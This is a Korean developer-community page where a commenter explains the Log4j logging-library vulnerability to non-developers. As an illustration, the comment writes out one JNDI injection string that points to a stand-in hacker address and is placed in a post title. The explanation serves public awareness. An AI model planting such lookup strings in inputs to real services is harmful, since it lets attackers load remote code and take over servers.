DownloadLoginSign Up
Click to apply the changed page
개발 관련 무엇이든 물어보세요. - 무지성 질문을 부끄러워 하지 않습니다.... more
Created at11 21, 2021
채널장이 되었네요
참고로 저는 개발자가 아닙니다...^^!
ㅋㅋㅋㅋㅋㅋㅋㅋㅋ... more
6 comments
End of list
"컴퓨터 사상 최악의 취약점 발견됐다".. 전세계 보안업계 '발칵'
개발자질문

46 followers

개발 관련 무엇이든 물어보세요. - 무지성 질문을 부끄러워 하지 않습니다. - 질문을 할 땐 뇌를 거치지 않고, 바로 키보드에 손을 올립니다. - 질문을 타이핑 했다면 바로 Ctrl + Enter 를 누릅니다. - 한번 작성한 질문 삭제하기 없기입니다.

1 comment
Let's chat!
    산책왕
    Dec 12, 2021
    자바언어를 쓰는 서비스에서 로그를 남기는(=이런 저런 히스토리를 기록해두는) 목적으로 쓰는 라이브러리(=도구)가 있는데요. 이 라이브러리에 심각한 보안 취약점이 발견됐다는 기사예요.
    서비스마다 자유로운 형식으로 로그를 기록하는데요.(예: 사용자 접속 시간일 수도 있고, 접속 URL일 수도 있고, 오류 내용일 수도 있고, 글 제목일 수도 있고) 이 로그에 특정 형식으로 원격 서버(=해커의 컴퓨터 주소)의 주소를 남기면 외부에서 서버를 조작할 수 있어서 치명적이라고 해요.
    예를 들어, 카페노노에서 히스토리를 남길 때 글 제목을 함께 남긴다고 가정해보면, 해커가 제목으로 "${jndi:ldap:해커주소.com} 매운맛좀 봐라" 이런 글을 쓰는 것만으로 카페노노 서비스를 조작할 수도 있게 돼서 치명적이라고 하는 거예요.
    더 문제는 이 라이브러리는 굉장히 유명한 라이브러리라서 거의 대부분의 자바 서비스에서 사용하고 있다는 건데요...
    그래서 자바 환경을 사용하고 있는 동료들은 지금 다들 바쁜 것 같네요.^^;;;